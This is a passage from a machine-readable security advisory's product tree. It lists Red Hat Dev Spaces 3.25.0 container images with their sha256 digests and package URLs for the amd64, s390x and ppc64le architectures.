"name": "registry.redhat.io/devspaces/openvsx-rhel9@sha256:a353e11c2f965642a1107d7b764edccd0888009fc991ec066fb40e4632692ac4_amd64",
"product": {
"name": "registry.redhat.io/devspaces/openvsx-rhel9@sha256:a353e11c2f965642a1107d7b764edccd0888009fc991ec066fb40e4632692ac4_amd64",
"product_id": "registry.redhat.io/devspaces/openvsx-rhel9@sha256:a353e11c2f965642a1107d7b764edccd0888009fc991ec066fb40e4632692ac4_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openvsx-rhel9@sha256%3Aa353e11c2f965642a1107d7b764edccd0888009fc991ec066fb40e4632692ac4?arch=amd64\u0026repository_url=registry.redhat.io/devspaces\u0026tag=3.25.0-1765276570"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:a4417f71e76b15d9c4f1c4657b2e5f2bb3979d498b362b42d9b207e37bf505d5_amd64",
"product": {
"name": "registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:a4417f71e76b15d9c4f1c4657b2e5f2bb3979d498b362b42d9b207e37bf505d5_amd64",
"product_id": "registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:a4417f71e76b15d9c4f1c4657b2e5f2bb3979d498b362b42d9b207e37bf505d5_amd64",
"product_identification_helper": {
"purl": "pkg:oci/devspaces-rhel9-operator@sha256%3Aa4417f71e76b15d9c4f1c4657b2e5f2bb3979d498b362b42d9b207e37bf505d5?arch=amd64\u0026repository_url=registry.redhat.io/devspaces\u0026tag=3.25.0-1765325702"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:74b83b79cba88af0545e7fb52dd70df2c1b96cf23b8963517fc779fbfe3e9aac_amd64",
"product": {
"name": "registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:74b83b79cba88af0545e7fb52dd70df2c1b96cf23b8963517fc779fbfe3e9aac_amd64",
"product_id": "registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:74b83b79cba88af0545e7fb52dd70df2c1b96cf23b8963517fc779fbfe3e9aac_amd64",
"product_identification_helper": {
"purl": "pkg:oci/devspaces-operator-bundle@sha256%3A74b83b79cba88af0545e7fb52dd70df2c1b96cf23b8963517fc779fbfe3e9aac?arch=amd64\u0026repository_url=registry.redhat.io/devspaces\u0026tag=3.25.0-1765597809"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:f67c1d7d8549587c1032404411b01472f71e775a7bbfd91927060c1b09a631c0_amd64",
"product": {
"name": "registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:f67c1d7d8549587c1032404411b01472f71e775a7bbfd91927060c1b09a631c0_amd64",
"product_id": "registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:f67c1d7d8549587c1032404411b01472f71e775a7bbfd91927060c1b09a631c0_amd64",
"product_identification_helper": {
"purl": "pkg:oci/pluginregistry-rhel9@sha256%3Af67c1d7d8549587c1032404411b01472f71e775a7bbfd91927060c1b09a631c0?arch=amd64\u0026repository_url=registry.redhat.io/devspaces\u0026tag=3.25.0-1765299828"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/server-rhel9@sha256:f7dbf103ed9452b48a61505498c8aa1e4f445e9bf40b62769fb16372597982d2_amd64",
"product": {
"name": "registry.redhat.io/devspaces/server-rhel9@sha256:f7dbf103ed9452b48a61505498c8aa1e4f445e9bf40b62769fb16372597982d2_amd64",
"product_id": "registry.redhat.io/devspaces/server-rhel9@sha256:f7dbf103ed9452b48a61505498c8aa1e4f445e9bf40b62769fb16372597982d2_amd64",
"product_identification_helper": {
"purl": "pkg:oci/server-rhel9@sha256%3Af7dbf103ed9452b48a61505498c8aa1e4f445e9bf40b62769fb16372597982d2?arch=amd64\u0026repository_url=registry.redhat.io/devspaces\u0026tag=3.25.0-1765225950"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/traefik-rhel9@sha256:44c8d3d034803b0f8307b56cafdfcf8083071e407139e701456acfb2e434b0c8_amd64",
"product": {
"name": "registry.redhat.io/devspaces/traefik-rhel9@sha256:44c8d3d034803b0f8307b56cafdfcf8083071e407139e701456acfb2e434b0c8_amd64",
"product_id": "registry.redhat.io/devspaces/traefik-rhel9@sha256:44c8d3d034803b0f8307b56cafdfcf8083071e407139e701456acfb2e434b0c8_amd64",
"product_identification_helper": {
"purl": "pkg:oci/traefik-rhel9@sha256%3A44c8d3d034803b0f8307b56cafdfcf8083071e407139e701456acfb2e434b0c8?arch=amd64\u0026repository_url=registry.redhat.io/devspaces\u0026tag=3.25.0-1764892466"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/udi-rhel9@sha256:8a19af8b03b59562335b3a3f77753944c27ecbccaeda3400d0f089a6cd8d11fa_amd64",
"product": {
"name": "registry.redhat.io/devspaces/udi-rhel9@sha256:8a19af8b03b59562335b3a3f77753944c27ecbccaeda3400d0f089a6cd8d11fa_amd64",
"product_id": "registry.redhat.io/devspaces/udi-rhel9@sha256:8a19af8b03b59562335b3a3f77753944c27ecbccaeda3400d0f089a6cd8d11fa_amd64",
"product_identification_helper": {
"purl": "pkg:oci/udi-rhel9@sha256%3A8a19af8b03b59562335b3a3f77753944c27ecbccaeda3400d0f089a6cd8d11fa?arch=amd64\u0026repository_url=registry.redhat.io/devspaces\u0026tag=3.25.0-1765582207"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/udi-base-rhel10@sha256:53eb58d4a5f32aa71bb7e0d3beedca005b0b68f1fa9f18e07d08e243a803a565_amd64",
"product": {
"name": "registry.redhat.io/devspaces/udi-base-rhel10@sha256:53eb58d4a5f32aa71bb7e0d3beedca005b0b68f1fa9f18e07d08e243a803a565_amd64",
"product_id": "registry.redhat.io/devspaces/udi-base-rhel10@sha256:53eb58d4a5f32aa71bb7e0d3beedca005b0b68f1fa9f18e07d08e243a803a565_amd64",
"product_identification_helper": {
"purl": "pkg:oci/udi-base-rhel10@sha256%3A53eb58d4a5f32aa71bb7e0d3beedca005b0b68f1fa9f18e07d08e243a803a565?arch=amd64\u0026repository_url=registry.redhat.io/devspaces\u0026tag=3.25.0-1765503811"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/udi-base-rhel9@sha256:1669477977f4722f931dba2693089f59ab77b5828869ec188e0bbff4966d7605_amd64",
"product": {
"name": "registry.redhat.io/devspaces/udi-base-rhel9@sha256:1669477977f4722f931dba2693089f59ab77b5828869ec188e0bbff4966d7605_amd64",
"product_id": "registry.redhat.io/devspaces/udi-base-rhel9@sha256:1669477977f4722f931dba2693089f59ab77b5828869ec188e0bbff4966d7605_amd64",
"product_identification_helper": {
"purl": "pkg:oci/udi-base-rhel9@sha256%3A1669477977f4722f931dba2693089f59ab77b5828869ec188e0bbff4966d7605?arch=amd64\u0026repository_url=registry.redhat.io/devspaces\u0026tag=3.25.0-1765406925"
}
}
}
],
"category": "architecture",
"name": "amd64"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/code-rhel9@sha256:869bac1a7cc51c0a780667abd7b47f9e42f2da22e6d6a57b5a1d7ecdeddcee7c_s390x",
"product": {
"name": "registry.redhat.io/devspaces/code-rhel9@sha256:869bac1a7cc51c0a780667abd7b47f9e42f2da22e6d6a57b5a1d7ecdeddcee7c_s390x",
"product_id": "registry.redhat.io/devspaces/code-rhel9@sha256:869bac1a7cc51c0a780667abd7b47f9e42f2da22e6d6a57b5a1d7ecdeddcee7c_s390x",
"product_identification_helper": {
"purl": "pkg:oci/code-rhel9@sha256%3A869bac1a7cc51c0a780667abd7b47f9e42f2da22e6d6a57b5a1d7ecdeddcee7c?arch=s390x\u0026repository_url=registry.redhat.io/devspaces\u0026tag=3.25.0-1765247843"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/code-sshd-rhel9@sha256:fdbae1704685d51d583b0c2e588ddf3b088b78cc84b239821421042c0943c098_s390x",
"product": {
"name": "registry.redhat.io/devspaces/code-sshd-rhel9@sha256:fdbae1704685d51d583b0c2e588ddf3b088b78cc84b239821421042c0943c098_s390x",
"product_id": "registry.redhat.io/devspaces/code-sshd-rhel9@sha256:fdbae1704685d51d583b0c2e588ddf3b088b78cc84b239821421042c0943c098_s390x",
"product_identification_helper": {
"purl": "pkg:oci/code-sshd-rhel9@sha256%3Afdbae1704685d51d583b0c2e588ddf3b088b78cc84b239821421042c0943c098?arch=s390x\u0026repository_url=registry.redhat.io/devspaces\u0026tag=3.25.0-1765247198"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/configbump-rhel9@sha256:e6f11881adb8f1675e5e3372339e648d99084d7d3f244d0de1eeebc96ed08dfc_s390x",
"product": {
"name": "registry.redhat.io/devspaces/configbump-rhel9@sha256:e6f11881adb8f1675e5e3372339e648d99084d7d3f244d0de1eeebc96ed08dfc_s390x",
"product_id": "registry.redhat.io/devspaces/configbump-rhel9@sha256:e6f11881adb8f1675e5e3372339e648d99084d7d3f244d0de1eeebc96ed08dfc_s390x",
"product_identification_helper": {
"purl": "pkg:oci/configbump-rhel9@sha256%3Ae6f11881adb8f1675e5e3372339e648d99084d7d3f244d0de1eeebc96ed08dfc?arch=s390x\u0026repository_url=registry.redhat.io/devspaces\u0026tag=3.25.0-1764892045"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/dashboard-rhel9@sha256:d17a2f913e7cef538d6537d0ad32e257e2d51c871fc66183ea291024e8e2afae_s390x",
"product": {
"name": "registry.redhat.io/devspaces/dashboard-rhel9@sha256:d17a2f913e7cef538d6537d0ad32e257e2d51c871fc66183ea291024e8e2afae_s390x",
"product_id": "registry.redhat.io/devspaces/dashboard-rhel9@sha256:d17a2f913e7cef538d6537d0ad32e257e2d51c871fc66183ea291024e8e2afae_s390x",
"product_identification_helper": {
"purl": "pkg:oci/dashboard-rhel9@sha256%3Ad17a2f913e7cef538d6537d0ad32e257e2d51c871fc66183ea291024e8e2afae?arch=s390x\u0026repository_url=registry.redhat.io/devspaces\u0026tag=3.25.0-1765354572"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/imagepuller-rhel9@sha256:70d4bfd4a877934fbdded33e39c349b3554bc371492ee2696260916b0119efcf_s390x",
"product": {
"name": "registry.redhat.io/devspaces/imagepuller-rhel9@sha256:70d4bfd4a877934fbdded33e39c349b3554bc371492ee2696260916b0119efcf_s390x",
"product_id": "registry.redhat.io/devspaces/imagepuller-rhel9@sha256:70d4bfd4a877934fbdded33e39c349b3554bc371492ee2696260916b0119efcf_s390x",
"product_identification_helper": {
"purl": "pkg:oci/imagepuller-rhel9@sha256%3A70d4bfd4a877934fbdded33e39c349b3554bc371492ee2696260916b0119efcf?arch=s390x\u0026repository_url=registry.redhat.io/devspaces\u0026tag=3.25.0-1764892891"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:56bed332699e952d3b4f4672420c379fa32954e77bb24aa3fec51823a0473703_s390x",
"product": {
"name": "registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:56bed332699e952d3b4f4672420c379fa32954e77bb24aa3fec51823a0473703_s390x",
"product_id": "registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:56bed332699e952d3b4f4672420c379fa32954e77bb24aa3fec51823a0473703_s390x",
"product_identification_helper": {
"purl": "pkg:oci/jetbrains-ide-rhel9@sha256%3A56bed332699e952d3b4f4672420c379fa32954e77bb24aa3fec51823a0473703?arch=s390x\u0026repository_url=registry.redhat.io/devspaces\u0026tag=3.25.0-1765246979"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/machineexec-rhel9@sha256:cca33584e4afced97c7c3c35af261890279a540df0f2da4d263e8862e2c14c6c_s390x",
"product": {
"name": "registry.redhat.io/devspaces/machineexec-rhel9@sha256:cca33584e4afced97c7c3c35af261890279a540df0f2da4d263e8862e2c14c6c_s390x",
"product_id": "registry.redhat.io/devspaces/machineexec-rhel9@sha256:cca33584e4afced97c7c3c35af261890279a540df0f2da4d263e8862e2c14c6c_s390x",
"product_identification_helper": {
"purl": "pkg:oci/machineexec-rhel9@sha256%3Acca33584e4afced97c7c3c35af261890279a540df0f2da4d263e8862e2c14c6c?arch=s390x\u0026repository_url=registry.redhat.io/devspaces\u0026tag=3.25.0-1764891834"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/openvsx-rhel9@sha256:8642741c5122757b5a01ee03e5a514a4d49b4048c6808b14ab5f8b7cece82d11_s390x",
"product": {
"name": "registry.redhat.io/devspaces/openvsx-rhel9@sha256:8642741c5122757b5a01ee03e5a514a4d49b4048c6808b14ab5f8b7cece82d11_s390x",
"product_id": "registry.redhat.io/devspaces/openvsx-rhel9@sha256:8642741c5122757b5a01ee03e5a514a4d49b4048c6808b14ab5f8b7cece82d11_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openvsx-rhel9@sha256%3A8642741c5122757b5a01ee03e5a514a4d49b4048c6808b14ab5f8b7cece82d11?arch=s390x\u0026repository_url=registry.redhat.io/devspaces\u0026tag=3.25.0-1765276570"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:c7871f233d3908f052954b132aa6c7b57c500e41899f02ac023098e2283380c5_s390x",
"product": {
"name": "registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:c7871f233d3908f052954b132aa6c7b57c500e41899f02ac023098e2283380c5_s390x",
"product_id": "registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:c7871f233d3908f052954b132aa6c7b57c500e41899f02ac023098e2283380c5_s390x",
"product_identification_helper": {
"purl": "pkg:oci/devspaces-rhel9-operator@sha256%3Ac7871f233d3908f052954b132aa6c7b57c500e41899f02ac023098e2283380c5?arch=s390x\u0026repository_url=registry.redhat.io/devspaces\u0026tag=3.25.0-1765325702"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:fb455374d650d93bbc4eca5616d041067cf1bcebc0dd6d0a92d8af16e2656708_s390x",
"product": {
"name": "registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:fb455374d650d93bbc4eca5616d041067cf1bcebc0dd6d0a92d8af16e2656708_s390x",
"product_id": "registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:fb455374d650d93bbc4eca5616d041067cf1bcebc0dd6d0a92d8af16e2656708_s390x",
"product_identification_helper": {
"purl": "pkg:oci/pluginregistry-rhel9@sha256%3Afb455374d650d93bbc4eca5616d041067cf1bcebc0dd6d0a92d8af16e2656708?arch=s390x\u0026repository_url=registry.redhat.io/devspaces\u0026tag=3.25.0-1765299828"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/server-rhel9@sha256:eec12e74a1bf7348f827b6c49d97f8cf9d27199ce2d35330f92ae3330020785f_s390x",
"product": {
"name": "registry.redhat.io/devspaces/server-rhel9@sha256:eec12e74a1bf7348f827b6c49d97f8cf9d27199ce2d35330f92ae3330020785f_s390x",
"product_id": "registry.redhat.io/devspaces/server-rhel9@sha256:eec12e74a1bf7348f827b6c49d97f8cf9d27199ce2d35330f92ae3330020785f_s390x",
"product_identification_helper": {
"purl": "pkg:oci/server-rhel9@sha256%3Aeec12e74a1bf7348f827b6c49d97f8cf9d27199ce2d35330f92ae3330020785f?arch=s390x\u0026repository_url=registry.redhat.io/devspaces\u0026tag=3.25.0-1765225950"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/traefik-rhel9@sha256:821f997cae0acae9048347c648c4f762a870b6548b8b7d14129315bf85b97276_s390x",
"product": {
"name": "registry.redhat.io/devspaces/traefik-rhel9@sha256:821f997cae0acae9048347c648c4f762a870b6548b8b7d14129315bf85b97276_s390x",
"product_id": "registry.redhat.io/devspaces/traefik-rhel9@sha256:821f997cae0acae9048347c648c4f762a870b6548b8b7d14129315bf85b97276_s390x",
"product_identification_helper": {
"purl": "pkg:oci/traefik-rhel9@sha256%3A821f997cae0acae9048347c648c4f762a870b6548b8b7d14129315bf85b97276?arch=s390x\u0026repository_url=registry.redhat.io/devspaces\u0026tag=3.25.0-1764892466"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/udi-rhel9@sha256:ef84715a61474b7a45b0b24c0d30370f51ab93ff86b70d5d345545253e01c3ae_s390x",
"product": {
"name": "registry.redhat.io/devspaces/udi-rhel9@sha256:ef84715a61474b7a45b0b24c0d30370f51ab93ff86b70d5d345545253e01c3ae_s390x",
"product_id": "registry.redhat.io/devspaces/udi-rhel9@sha256:ef84715a61474b7a45b0b24c0d30370f51ab93ff86b70d5d345545253e01c3ae_s390x",
"product_identification_helper": {
"purl": "pkg:oci/udi-rhel9@sha256%3Aef84715a61474b7a45b0b24c0d30370f51ab93ff86b70d5d345545253e01c3ae?arch=s390x\u0026repository_url=registry.redhat.io/devspaces\u0026tag=3.25.0-1765582207"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/udi-base-rhel10@sha256:d50d87f4bbcabaa25d7b8a4c09d956d0d8eec926bd1c01fa1a506266e2056162_s390x",
"product": {
"name": "registry.redhat.io/devspaces/udi-base-rhel10@sha256:d50d87f4bbcabaa25d7b8a4c09d956d0d8eec926bd1c01fa1a506266e2056162_s390x",
"product_id": "registry.redhat.io/devspaces/udi-base-rhel10@sha256:d50d87f4bbcabaa25d7b8a4c09d956d0d8eec926bd1c01fa1a506266e2056162_s390x",
"product_identification_helper": {
"purl": "pkg:oci/udi-base-rhel10@sha256%3Ad50d87f4bbcabaa25d7b8a4c09d956d0d8eec926bd1c01fa1a506266e2056162?arch=s390x\u0026repository_url=registry.redhat.io/devspaces\u0026tag=3.25.0-1765503811"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/udi-base-rhel9@sha256:5411419f1400a2e1345d430df21d5b6ae9fc00d99a89549d7bf889e82a8f350b_s390x",
"product": {
"name": "registry.redhat.io/devspaces/udi-base-rhel9@sha256:5411419f1400a2e1345d430df21d5b6ae9fc00d99a89549d7bf889e82a8f350b_s390x",
"product_id": "registry.redhat.io/devspaces/udi-base-rhel9@sha256:5411419f1400a2e1345d430df21d5b6ae9fc00d99a89549d7bf889e82a8f350b_s390x",
"product_identification_helper": {
"purl": "pkg:oci/udi-base-rhel9@sha256%3A5411419f1400a2e1345d430df21d5b6ae9fc00d99a89549d7bf889e82a8f350b?arch=s390x\u0026repository_url=registry.redhat.io/devspaces\u0026tag=3.25.0-1765406925"
}
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/code-rhel9@sha256:46811ca65f64fb6d260e3dca253947c749b6dd31ce3185f36e729ea817f454a4_ppc64le",
"product": {
"name": "registry.redhat.io/devspaces/code-rhel9@sha256:46811ca65f64fb6d260e3dca253947c749b6dd31ce3185f36e729ea817f454a4_ppc64le",
"product_id": "registry.redhat.io/devspaces/code-rhel9@sha256:46811ca65f64fb6d260e3dca253947c749b6dd31ce3185f36e729ea817f454a4_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/code-rhel9@sha256%3A46811ca65f64fb6d260e3dca253947c749b6dd31ce3185f36e729ea817f454a4?arch=ppc64le\u0026repository_url=registry.redhat.io/devspaces\u0026tag=3.25.0-1765247843"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/code-sshd-rhel9@sha256:e34005d1fc54aaf8863c5f0bf4bdd30120e65df1a61a6e775f0998e0be152582_ppc64le",
"product": {
"name": "registry.redhat.io/devspaces/code-sshd-rhel9@sha256:e34005d1fc54aaf8863c5f0bf4bdd30120e65df1a61a6e775f0998e0be152582_ppc64le",
"product_id": "registry.redhat.io/devspaces/code-sshd-rhel9@sha256:e34005d1fc54aaf8863c5f0bf4bdd30120e65df1a61a6e775f0998e0be152582_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/code-sshd-rhel9@sha256%3Ae34005d1fc54aaf8863c5f0bf4bdd30120e65df1a61a6e775f0998e0be152582?arch=ppc64le\u0026repository_url=registry.redhat.io/devspaces\u0026tag=3.25.0-1765247198"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/configbump-rhel9@sha256:b2c13795589df33fec7a6c6b5ed37e11db14f134bfcc7ee0350e3df372f5da88_ppc64le",
"product": {
"name": "registry.redhat.io/devspaces/configbump-rhel9@sha256:b2c13795589df33fec7a6c6b5ed37e11db14f134bfcc7ee0350e3df372f5da88_ppc64le",
"product_id": "registry.redhat.io/devspaces/configbump-rhel9@sha256:b2c13795589df33fec7a6c6b5ed37e11db14f134bfcc7ee0350e3df372f5da88_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/configbump-rhel9@sha256%3Ab2c13795589df33fec7a6c6b5ed37e11db14f134bfcc7ee0350e3df372f5da88?arch=ppc64le\u0026repository_url=registry.redhat.io/devspaces\u0026tag=3.25.0-1764892045"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/dashboard-rhel9@sha256:6137931395a4cbfa07e5579172ed579babd14a2d1e054238298eee1aee4e2c07_ppc64le",
"product": {
"name": "registry.redhat.io/devspaces/dashboard-rhel9@sha256:6137931395a4cbfa07e5579172ed579babd14a2d1e054238298eee1aee4e2c07_ppc64le",
"product_id": "registry.redhat.io/devspaces/dashboard-rhel9@sha256:6137931395a4cbfa07e5579172ed579babd14a2d1e054238298eee1aee4e2c07_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/dashboard-rhel9@sha256%3A6137931395a4cbfa07e5579172ed579babd14a2d1e054238298eee1aee4e2c07?arch=ppc64le\u0026repository_url=registry.redhat.io/devspaces\u0026tag=3.25.0-1765354572"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/imagepuller-rhel9@sha256:859b5a54204008d575e774ca4794c346c0195750b5617ae56dccaf3dfa3d3f1b_ppc64le",
"product": {
"name": "registry.redhat.io/devspaces/imagepuller-rhel9@sha256:859b5a54204008d575e774ca4794c346c0195750b5617ae56dccaf3dfa3d3f1b_ppc64le",
"product_id": "registry.redhat.io/devspaces/imagepuller-rhel9@sha256:859b5a54204008d575e774ca4794c346c0195750b5617ae56dccaf3dfa3d3f1b_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/imagepuller-rhel9@sha256%3A859b5a54204008d575e774ca4794c346c0195750b5617ae56dccaf3dfa3d3f1b?arch=ppc64le\u0026repository_url=registry.redhat.io/devspaces\u0026tag=3.25.0-1764892891"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:8714c6e69cdc81f39c44a4d17dda5a4574e104eafeb6d3deb5f29b879e5f0f99_ppc64le",
"product": {
"name": "registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:8714c6e69cdc81f39c44a4d17dda5a4574e104eafeb6d3deb5f29b879e5f0f99_ppc64le",
"product_id": "registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:8714c6e69cdc81f39c44a4d17dda5a4574e104eafeb6d3deb5f29b879e5f0f99_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/jetbrains-ide-rhel9@sha256%3A8714c6e69cdc81f39c44a4d17dda5a4574e104eafeb6d3deb5f29b879e5f0f99?arch=ppc64le\u0026repository_url=registry.redhat.io/devspaces\u0026tag=3.25.0-1765246979"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/machineexec-rhel9@sha256:296a441f00d4749301a9aee06a998f29ac64bb9c50d7e090711b33776a845f03_ppc64le",
"product": {
"name": "registry.redhat.io/devspaces/machineexec-rhel9@sha256:296a441f00d4749301a9aee06a998f29ac64bb9c50d7e090711b33776a845f03_ppc64le",
"product_id": "registry.redhat.io/devspaces/machineexec-rhel9@sha256:296a441f00d4749301a9aee06a998f29ac64bb9c50d7e090711b33776a845f03_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/machineexec-rhel9@sha256%3A296a441f00d4749301a9aee06a998f29ac64bb9c50d7e090711b33776a845f03?arch=ppc64le\u0026repository_url=registry.redhat.io/devspaces\u0026tag=3.25.0-1764891834"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/openvsx-rhel9@sha256:5b136fff0f0c8ff4d56fdb934eef1dd7d04ebdac13e7cb8c1e020bf370f4df84_ppc64le",
"product": {
"name": "registry.redhat.io/devspaces/openvsx-rhel9@sha256:5b136fff0f0c8ff4d56fdb934eef1dd7d04ebdac13e7cb8c1e020bf370f4df84_ppc64le",
"product_id": "registry.redhat.io/devspaces/openvsx-rhel9@sha256:5b136fff0f0c8ff4d56fdb934eef1dd7d04ebdac13e7cb8c1e020bf370f4df84_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openvsx-rhel9@sha256%3A5b136fff0f0c8ff4d56fdb934eef1dd7d04ebdac13e7cb8c1e020bf370f4df84?arch=ppc64le\u0026repository_url=registry.redhat.io/devspaces\u0026tag=3.25.0-1765276570"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:690264c2631bd5a2341b37c1d3099a84e9bfb5eb2afab2937c0453a2475d0111_ppc64le",
"product": {
"name": "registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:690264c2631bd5a2341b37c1d3099a84e9bfb5eb2afab2937c0453a2475d0111_ppc64le",
"product_id": "registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:690264c2631bd5a2341b37c1d3099a84e9bfb5eb2afab2937c0453a2475d0111_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/devspaces-rhel9-operator@sha256%3A690264c2631bd5a2341b37c1d3099a84e9bfb5eb2afab2937c0453a2475d0111?arch=ppc64le\u0026repository_url=registry.redhat.io/devspaces\u0026tag=3.25.0-1765325702"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:10821feaf0ba17ef30f0403d29862004615952e289af23794e15d3354bc4f288_ppc64le",
"product": {
"name": "registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:10821feaf0ba17ef30f0403d29862004615952e289af23794e15d3354bc4f288_ppc64le",
"product_id": "registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:10821feaf0ba17ef30f0403d29862004615952e289af23794e15d3354bc4f288_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/pluginregistry-rhel9@sha256%3A10821feaf0ba17ef30f0403d29862004615952e289af23794e15d3354bc4f288?arch=ppc64le\u0026repository_url=registry.redhat.io/devspaces\u0026tag=3.25.0-1765299828"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/server-rhel9@sha256:3a3da41883a104931b483ce6f5ff089a7fe3fa7b409a0b66ec1d8d396903f246_ppc64le",
"product": {
"name": "registry.redhat.io/devspaces/server-rhel9@sha256:3a3da41883a104931b483ce6f5ff089a7fe3fa7b409a0b66ec1d8d396903f246_ppc64le",
"product_id": "registry.redhat.io/devspaces/server-rhel9@sha256:3a3da41883a104931b483ce6f5ff089a7fe3fa7b409a0b66ec1d8d396903f246_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/server-rhel9@sha256%3A3a3da41883a104931b483ce6f5ff089a7fe3fa7b409a0b66ec1d8d396903f246?arch=ppc64le\u0026repository_url=registry.redhat.io/devspaces\u0026tag=3.25.0-1765225950"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/traefik-rhel9@sha256:3e6de411cafc0aee65b36541803bebc84070ff69bab6f3f4691d65074fe36307_ppc64le",
"product": {
"name": "registry.redhat.io/devspaces/traefik-rhel9@sha256:3e6de411cafc0aee65b36541803bebc84070ff69bab6f3f4691d65074fe36307_ppc64le",
"product_id": "registry.redhat.io/devspaces/traefik-rhel9@sha256:3e6de411cafc0aee65b36541803bebc84070ff69bab6f3f4691d65074fe36307_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/traefik-rhel9@sha256%3A3e6de411cafc0aee65b36541803bebc84070ff69bab6f3f4691d65074fe36307?arch=ppc64le\u0026repository_url=registry.redhat.io/devspaces\u0026tag=3.25.0-1764892466"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/udi-rhel9@sha256:72e67f67750d8cdb639ab2fc274063e622075e00ceda667a89b54c6e0d8de955_ppc64le",
"product": {
"name": "registry.redhat.io/devspaces/udi-rhel9@sha256:72e67f67750d8cdb639ab2fc274063e622075e00ceda667a89b54c6e0d8de955_ppc64le",
"product_id": "registry.redhat.io/devspaces/udi-rhel9@sha256:72e67f67750d8cdb639ab2fc274063e622075e00ceda667a89b54c6e0d8de955_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/udi-rhel9@sha256%3A72e67f67750d8cdb639ab2fc274063e622075e00ceda667a89b54c6e0d8de955?arch=ppc64le\u0026repository_url=registry.redhat.io/devspaces\u0026tag=3.25.0-1765582207"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/udi-base-rhel10@sha256:63833e84093a729b0624238325e783fbcb1e22a7649dc1b59998bcce6ac450ef_ppc64le",
"product": {
"name": "registry.redhat.io/devspaces/udi-base-rhel10@sha256:63833e84093a729b0624238325e783fbcb1e22a7649dc1b59998bcce6ac450ef_ppc64le",
"product_id": "registry.redhat.io/devspaces/udi-base-rhel10@sha256:63833e84093a729b0624238325e783fbcb1e22a7649dc1b59998bcce6ac450ef_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/udi-base-rhel10@sha256%3A63833e84093a729b0624238325e783fbcb1e22a7649dc1b59998bcce6ac450ef?arch=ppc64le\u0026repository_url=registry.redhat.io/devspaces\u0026tag=3.25.0-1765503811"
}
}
},
{
"category": "product_version",
